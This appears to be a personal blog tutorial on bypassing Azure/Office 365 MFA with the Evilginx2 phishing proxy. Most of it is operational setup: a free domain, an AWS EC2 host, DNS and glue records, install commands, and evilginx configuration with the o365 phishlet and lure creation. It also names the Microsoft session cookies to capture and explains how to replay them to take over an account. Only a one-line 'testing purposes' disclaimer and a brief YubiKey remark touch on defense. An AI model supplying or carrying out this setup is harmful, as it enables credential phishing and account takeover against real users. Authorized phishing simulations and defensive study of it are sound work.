Bypassing MFA with Evilginx2

In that blog I will try to explain which implementation that I have done in order to bypass MFA in Azure.

Take a domain name in Freenom.

freenom.com is giving you great opportunity to take free domain names so just a grab one there.

After taking a domain name. You need to create EC2 instance in your AWS accoount. Of course you can use some virtual private server provider or some hosting provider but for me it was easy to configure that in AWS.

I have configured AWS ubuntu in my account.

And uploaded to there evilginx2 phishing tool. For evilginx2 tool worked properly you should configure DNS records there, without configuring these records it will be hard to get tokens of your victims.

As the first step you need to install go in your instance.

apt install golang-go
go get -u github.com/kgretzky/evilginx2
sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
make install

Now you should not run evilginx because we didn't configure our DNS.

Let's turn back to our freenom.com page and manage our domain.

From that section go to DNS configuration place.

Then Manage DNS section.

Put there the subdomains that you want to use. Actually, it depends on which phishlets you will use. But in my case I have used o365 phishlet so, I have added to there account and login.

And your EC2 instance public IP that you will use.

After adding these we need to implement our nameserver glue records.

From that section you need to put your domain name records.

In my case, I have added my domain name record there and my public EC2 instance IP.

yeah after that comes waiting part because changing these records to be implemented in the system takes time.

After adding these sections go to your EC2 instance and connect via the terminal.

Probably you will have problem with DNS, HTTPS, HTTP connections. So you need to be aware these are open to all IPs with your security groups.

I have done some DNS implementations in my AWS EC2 instance. Maybe that will not work for you case but in case you will have a problem when you run evilginx. Like Failed to conned port 53 . Here is the solution that worked for me.

 sudo rm /etc/resolv.conf
 ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf
 
 systemctl stop systemd-resolved.service

in your /etc/hosts file add that section.

internal-ip yourdomain.com

After these configurations run your evilginx with debug because I was not able to configure any phishlet to save tokens.

run these commands for running evilginx in debug mode.

evilginx -debug

in evilginx2 run these command,

config domain yourdomain.com
config ip a.b.c.d

blacklist unauth

phishlets enable o365
lures create o365
lures edit #putIDthere redirect_url https://portal.azure.com
lures get-url #putIDthere

After getting the URL from evilginx open an incognito browser and test.

In my case, evilginx was not able to save tokens of my victims(my account here). But in debug mode, I was able to see these tokens.

For o365 phishlet, you need to sniff these tokens

ESTSAUTHPERSISTENT
ESTSAUTH
ESTSAUTHLIGHT
SignInStateCookie

After taking these values go to your browser and with cookie editor extension change these while trying to login https://www.office.com/?auth=2 and refresh the page.

You are in.

Please use it for testing purposes. 

On defending side, By using yubikey it is possible to stop these kinds of phishing attacks. During phishing, user will see that kind of a screen if he/she using the yubikey.

And later, it will throw an error like that shown below.